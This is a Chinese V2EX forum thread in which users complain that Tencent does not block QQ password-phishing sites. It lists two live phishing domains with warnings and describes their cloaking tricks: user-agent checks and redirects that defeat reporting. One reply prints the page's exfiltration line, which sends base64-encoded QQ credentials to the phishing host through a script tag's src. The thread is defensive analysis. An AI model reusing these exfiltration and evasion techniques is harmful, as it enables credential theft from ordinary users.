腾讯到现在都不能自动识别出这种低端钓鱼盗号网站么

2018-12-22 00:07:17 +08:00
 HXM

截图: https://i.loli.net/2018/12/22/5c1d0f003b937.png

链接是: http://sundonggen.com 不要在里面输入帐号密码!!

破网站连个 https 都没有,输入时弹出的键盘还是 iOS 键盘,让我一个用 Android 的情何以堪

不管输入什么第一次登录都提示错误

如果你在 QQ 内置浏览器打开,然后按右上角举报,他会在你按右上角时跳转到腾讯官方的一个页面,这样举报时自动填写的链接地址就是腾讯官方页面地址,就举报不到它

如果电脑访问,即使用 chrome 开发者工具模拟 iPhone6 或 pixel 2,也会跳转腾讯官方的一个页面

Whois 查询到域名在阿里云注册,阿里云的举报还居然需要注册登录或者上传身份证明

腾讯拦截不了,想举报一下做一点微小的工作也不行。

8518 次点击
所在节点    全球工单系统
45 条回复
boris1993
2018-12-22 00:50:11 +08:00
孙冻根.com ???
v2016
2018-12-22 00:57:20 +08:00
我去研究研究 希望别挂掉
orangeade
2018-12-22 00:59:28 +08:00
腾讯只会屏蔽没备案网站
C2G
2018-12-22 01:22:05 +08:00
测试真伪很简单 QQ 号输入 10001 如果提示不是正确 QQ 号一定是假的 反之也不一定是真的
banshicy
2018-12-22 01:36:04 +08:00
还有这个,查域名也是阿里云注册的,现在人都这么屌了么,, [提示] 不要输入任何信息 http://zhijianjimo.com
Drumming
2018-12-22 01:50:14 +08:00
没了
boris1993
2018-12-22 01:57:49 +08:00
@Drumming #6 得用手机,电脑打开自动跳到一个图片上
mario85
2018-12-22 04:07:23 +08:00
chrome 设置 ua 没
zyqf
2018-12-22 04:14:02 +08:00
我之前写了个脚本,随机生成 QQ 号和密码提交上去。放在几个服务器上跑了两天,提交了大概有一两百万条吧。
xeaglex
2018-12-22 05:50:08 +08:00
@zyqf 你这就很强了 23333
zturns
2018-12-22 06:37:23 +08:00
腾讯只看钱,备案的网站有时候还没没备案的有用。创宇云天天打电话
xanthu
2018-12-22 07:20:22 +08:00
上次碰个 https 的钓鱼网站把身份证和手机信息泄露了,贼气一点办法都没得
HXM
2018-12-22 07:38:57 +08:00
@banshicy 感觉像一套源码,弹出的键盘都一模一样

@mario85 对,应该是做了 UA 判断

@orangeade 这种网站也居然也敢光明正大的备案。。。

@xanthu 老哥,https 也不能证明就是官方网站,事关重要账号的网站最好点到安全信息里看看证书详情
xuecan
2018-12-22 08:30:10 +08:00
那就去举报备案
galikeoy
2018-12-22 09:04:27 +08:00
@zyqf 哈哈哈哈哈
AlisaDestiny
2018-12-22 09:14:18 +08:00
简单分析了一下。这人还挺狡猾的,没有通过常规的 ajax 的方式提交,而是通过 js 动态创建 script 标签,在指定 src 的时候把用户名和密码当做参数附加在后面:sundonggen.com/user.js?token=encodeURIComponent(btoa(JSON.stringify({ u: "你的 QQ",p: "你的密码"}))));然后返回的是正常的 jquery 库代码。
opengps
2018-12-22 09:41:22 +08:00
我见过最牛逼的钓鱼网站,自带举报入口,让那些举报的人找不对入口
580a388da131
2018-12-22 10:23:45 +08:00
做的好精致
LanFomalhaut
2018-12-22 10:27:56 +08:00
实际使用中还有腾讯的“任意跳转漏洞”等等在利用: )
甚至有表现为 QQ 打开后下拉 上方 URL 显示为腾讯的某官方域名
openbsd
2018-12-22 10:55:11 +08:00
鹅厂的回复一般是:您的举报证据不足,如果您有了经济损失啥的,请报警,所以说,免费的东西真心有点坑

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/519899

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX